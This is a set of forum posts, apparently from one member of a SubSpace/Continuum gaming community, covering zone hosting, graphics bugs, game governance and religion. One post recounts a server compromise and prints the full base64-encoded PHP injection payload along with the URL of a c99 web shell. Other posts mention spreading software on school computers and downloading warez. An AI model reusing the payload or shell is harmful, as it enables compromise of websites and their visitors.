  1. How does one go about getting SSC authorization or access to one of their zones? I am interested in hooking up BlueT Jackpot SVS to SSC.
  2. Congratulations Distort! :]

Minimum size of 500x100 (you should probably do something like 1000x200 or greater [while maintaining the scale ratio]). Didn't know you were doing this for HyperSpace money/credits -- unfortunately I do not play in HyperSpace (or Subspace very much at all for that matter). If you would like, I could provide you with some free full-blown webhosting through BlueToast, for personal/business/commercial use. It's all I've got to offer. If it's not good enough for an offer or something -- you don't have to make a signature image. ;o Like I said, didn't know you were doing this for actual game points, but rather as a volunteered thing on these forums. :X

Old/Nostalgic/VIE/SVS/Subspace signature image? Perhaps with Jackpot SVS written on it or something (for the zone BlueT Jackpot SVS). Amazing work you have there.
  5. At school I installed a copy of Subdir's Continuum installer (http://www.subdir.net/files/Continuum040Setup.exe) on all the school computers in the Personal Finance/Comp Apps/Media/Keyboarding room (around 24 to 26 computers) and ran a copy of BlueT Dragonball Z on one of the unused computers in the back of the room. A bunch of students noticed me playing Subspace/Continuum one hour and quickly gained interest in the game, so I shown them that I installed it on all the computers and within just a couple days a bunch of students every day play the game over the school's network in the BlueT Dragonball Z copy (LAN Dragonball Z in this case). Some of those students wanted a copy of the game, so having already prepared a quick-distribution package that included the (1) installer and (2) copy-paste-execute versions, I copied it to a few flash drives already (and you could guess that any other student that would want it would seek it from these flash drive owners, and they'd just copy and paste over the package as I did). :] Woot. (School's internet sucks for netplay, which is why I launched a LAN version of BlueT Dragonball Z).
  6. Meh, guess I was wrong. Hahah, free and everything!
  7. Subspace is saved!
  8. Ugh. hlrse.net was hit with a similar script attack about a month ago. But the only way it could have happened on HLRSE is if someone had FTP access and PHP abilities under public_html. As most of you may know, with PHP you can search directories beneath/above yours and get a directory listing as well as execute/manipulate files. With a situation like this at hlrse.net (not giving details as to why "a someone had FTP access" to a subdirectory in public_html), whether it was by accident or purpose, someone attempted to attack the server with a script that injected a line of PHP into the top of every file. It targeted more than just html and php files too, but I think the script was only successful enough to hit html and php files. The reason the script failed was because, if executed in a partitioned and safe environment, you would find that the script was full of errors. The main ingredients of that line had been in base64 encoding, which if decrypted, located a primary file on the server that was ALSO in base64. If decoded, you would get multitudes of chunks of base64 parts. In one of the parts we found the main part of this file. Unfortunately the privatepaste/pastebin's my host and I had regarding this have already been deleted. The following is that "one liner" that was inserted (with PHP, base64 and eval()): aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JB TFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc 3RzKCcvaG9tZS9obHJzZS9wdWJsaWNfaHRtbC9maWZ0eWZvdXIvd3AtY29udG VudC9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3dwMS41XzIuMC9 3cC1hZG1pbi8uc3ZuL3RtcC9wcm9wcy9qcy5waHAnKSl7aW5jbHVkZV9vbmNl KCcvaG9tZS9obHJzZS9wdWJsaWNfaHRtbC9maWZ0eWZvdXIvd3AtY29udGVud C9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3dwMS41XzIuMC93cC 1hZG1pbi8uc3ZuL3RtcC9wcm9wcy9qcy5waHAnKTtpZihmdW5jdGlvbl9leGl zdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVu Y3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZ Cl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpey RlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9Mis kZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYm MTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO 30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JH U9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0N vbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJl Z19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlK CcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cm V0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19 The main file ended up linking to/reading/executing/whatever from the following (NOTE -- Your AV will pick this text file of code up as "PHP/C99SHell.A trojan" according to NOD32): http://otoelektronik.net/shell/c99.txt Although this has little relevance (or non at all) to THIS issue here in the community sites, some of you may find this stuff awesomely interesting. Perhaps this is an attempted script attack, no doubt. At least the server wasn't hijacked, or much damage done (hopefully).
  9. I think you missed my point. If you are in Europe, you should be downloading your warez through rapidshare.de, NOT rapidshare.com. Point being that they have servers/centers in both Europe and North America. What's your problem? *tsk* I dare you to tell Priit to move to America.
  10. Give it some time. Not everything happens over a single night.
  11. Fail. Didn't you notice the e-mail header of the message sent to Grem? It's from rapidshare.com, not rapidshare.de. And besides, I'm pretty sure that Christian Schmid is speaking for all of RapidShare[.*]. But you're forgetting the fact that RapidShare (Christian) and Priit (Skype/Kazaa), both from big and large companies that are well-known, have at least some knowledge and experience with playing together, and I'm also pretty sure that Priit wouldn't actually ignore an e-mail from a high level of RapidShare power hierarchy.
  12. Nothing ventured is nothing gained.
  13. This is completely incorrect. 1. The current Continuum and server files will always be available no matter what happens. 2. The community has everything to gain; VIE once ruled this game, but then they gave the game up and the game went under control of a non-corporate/company, "player" council. This game needs a company to rule, a company willing to put their time, effort, and money into the game again as once did VIE. Besides, if this game is really that bad, it'd be their loss, not ours. 3. This community has everything to lose without #2; at this rate we will die a slow and guaranteed death. 4. If you don't like RS, then go run your own network or join Snrrrub's Isometry network. SSC is the same as it had been years ago; around 3 weeks ago I submitted an application for BlueT Jackpot SVS and/or BlueT Dragonball Z to receive SSC access, and for BlueT Jackpot SVS' site to go into the Subspace Bar at the top of these forums. Since then I've not even got a single reply, single word, any updates or information. I'm being completely ignored. One thought I had was if they created their own biller or network, or joined with Isometry and ran their SSC-independent thing. However, the only problem I myself have with this is the inability to develop Continuum and the non-SSC messages (Snrrrub already has a client hack to remove this, so non-SSC messages aren't that much of a problem). Now the fact that Christian Schmid and Priit have a history together and that they are both working for huge companies -- Priit could be motivated (and/or paid) by RapidShare to keep the game moving. If RapidShare goes their own network, independent from SSC, they will run into some issues, such as the non-SSC messages and having to develop their own biller (but that wouldn't be a problem if they can afford to hire a company to clone the game). If they run the community as did VIE, they will have more than just plain administrative access. This community NEEDS a company/corporation to run this game, to invest in this game, and to lead the way. Just look back all the way to 2000; since then this game has only been dying, getting worse, getting nowhere, and the community becoming a flamefest and full of ignorance, arrogance, and without any direction. RapidShare can give the community a direction because they have the money, they are willing to invest into this game, they have the time, they have everything needed. I doubt Priit would ignore an e-mail or communication with a large company like RapidShare.
  14. I won't even read the replies. Go for it. If you decide otherwise, you're screwing yourself AND the community.
  15. O_o Do you have any screenshots of your work so far? Anything available to the public to try out?
  16. I don't know about you, but on Windows XP on a 6800XT video card, running 32-bit @ 1600x1200 or greater was much slower than the same resolution at 16-bit. EDIT: But oddly enough, my HD4850 says otherwise. Just did a benchmark: When in a ship in the very center of BlueT Dragonball Z (LVZ oriented center, etc), I get between 64 and 66 frames for each color depth. When in spectator mode and viewing C3 in Trench Wars, holding the ALT button to enlarge the radar, I get between 750 and 790 for 8-bit, 850 to 890 for 16-bit, and 900-950 for 32-bit. All on 1024x768. Meh, weird. You're right. :\
  17. In a performance sense, yes it does. In Continuum, one can get a massive performance and framerate boost if they lower the color depth; tremendously less work on the hardware for some reason. And my desktop is set to 32bit (why would I set it lower?). The setup of Continuum that I use uses PNG/GIF graphics instead (a couple files remain in *.bm2 due to the client's incompatibility in some places). After restoring the original *.bm2 files, the banners fixed themselves. Before I did this, I had resaved my gradients.png/gif and colors.png/gif to *.bm2 (bmp format) -- which had NOT resolved the issue. Now I am going to figure out what graphic is specifically responsible for the color distortion. Thanks! EDIT :: tiles.bm2 was responsible. What Continuum apparently does is read the color depth from this file and re-uses it for banners. If you have the color depth on tiles.bm2 set to 2-bit, Continuum will render banners in 2-bit.
  18. No luck; still get blueish banners. I usually have my Color Depth set to 16 bit as well, since like 99% of the zones (at least the ones in my list) don't use any greater than 16-bit colors.
  19. http://www.hlrse.net/Qwerty/cont-bannerlist.png Banner listing when wanting to choose a banner. http://www.hlrse.net/Qwerty/cont-bannerlist2.png Random public arena in Trench Wars. By default, for Advanced Options I use Show Default Resolutions, Avoid Page Flipping, and No Framerate Limit. I have tried Creemy's set of Advanced Options (and it did not work): Avoid Page Flipping, Disable Clipping, and No Framerate Limit. I have tried unchecking everything Advanced Options with no success. I have tried checking Banners in Advanced Options with no success; instead of banners appearing blue'ish, they appeared lightblue or skyblue colored.
  20. Totally agree. You could use the Edit button, by the way.
  21. That's really cool Diwa. Where do you get all that free time to do that?
  22. Nice.
  23. I only started in 1998 and played all the up to like 2005-06 before quitting for a year or something and then coming back (after many of the flamers, old timers, and others left the game). I run a zone called BlueT Jackpot SVS, which is supposed to be a rerun of Jackpot Zone and some of the older gameplay features (such as the player with the most points in the arena being allowed to use the Nightwasp, or ship 7 [Lancaster], and that only SysOps can use Ship . The zone also contains all the VIE maps ever made (including Sniper maps and in-between maps from the first SubSpace client to the latest). One time I played in one of those Chaos Flag Deathmatch Tournaments, and I was on dialup at the time (this was a couple years ago); I enjoyed that event so much despite my poor internet connection that it gave me more motivation to work on Jackpot SVS. I still have to finish the forum at http://jackpotsvs.hlrse.net/ before getting a domain, advertising it and submitting it to the SSCentral Navbar, as well as a request for SSC authorization. I didn't really make any part of the zone, but more-so it's a situation that I compiled everything together. Some stuff I did make though, like the news.txt, the graphics and styles for the forum (graphics made from complete scratch; some images may borrow an element or two from original VIE/client graphics though). The Sniper maps and stuff I also had to manually "remake" from scratch since I couldn't just grab the *.lvl file. I know that there's one map in particular that I have not finished retiling; there were two or three Sniper maps that I cloned and I retiled all but one. I also plan on making a clone of the original Sniper tileset and making a Sniper tileset-original version of the maps (the ones so far use my creative exploration with modern VIE tiles). One of the features that, unfortunately due to complications, could not include in Jackpot SVS was the part where you could get stuck inside the middle of a wormhole. Based on the research that I did (I did a lot of going around, back and forth, asking random players in Trench Wars, Chaos and other zones [the ones you might consider "newbs" or people that just play and never show themselves in the community, such as the forums], etcetera), if you got sucked into a wormhole and couldn't manage to escape it, you would be stuck suspended in the middle of the wormhole. The only thing you could do is shoot out from the wormhole at other players passing by (could not use bombs as they were affected by gravity), and to escape you could either be killed, use a portal, respawn, change ship, or attach to another player on the same frequency. I enjoy SVS, VIE, and nostalgic material. I work with Jackpot SVS as a personal hobby sort of thing. Could you please spend some time exporting your memories and as much thought possible about the old times here? I would love to read about it. Like, what is this news.txt site? What was it like? Do you remember what URL or website address it might have been at (so that I could use archive.org to see what it might have looked like)? I want to know more!
  24. Religion http://dictionary.reference.com/browse/religion Religious http://dictionary.reference.com/browse/religious All religions have to do with a belief and faith of some sort. And as a result (including the 'custom' definitions made already), each and every one of them must in some way have moral and ethical guidelines. Your belief influences and defines in your world what right and wrong is. Ethics http://dictionary.reference.com/browse/ethics "that branch of philosophy dealing with values relating to human conduct, with respect to the rightness and wrongness of certain actions and to the goodness and badness of the motives and ends of such actions." Morals http://dictionary.reference.com/browse/morals "of, pertaining to, or concerned with the principles or rules of right conduct or the distinction between right and wrong; ethical: moral attitudes." What do you believe is right and wrong? Starting at the very beginning, I could honestly believe that it would be ok for me to kill people (there are people out there like that). That would already be my religion, because you don't know if there is an absolute truth to what really is right and what really is wrong. And because nobody really knows the ultimate global absolute to the rights and wrongs in this universe, people will formulate their own philosophies, deductions, conclusions, beliefs, etc. Without any morals and ethics (values for what is right and wrong), then what are you? Are you dead? I have to agree with your definition of religion, by the way.
  25. You can't not have a religion. Everyone has a religion whether or not they claim to have one. Ethics and morals have all to do with it; it is what you believe is right and wrong. Just stop and think about this if you think otherwise.
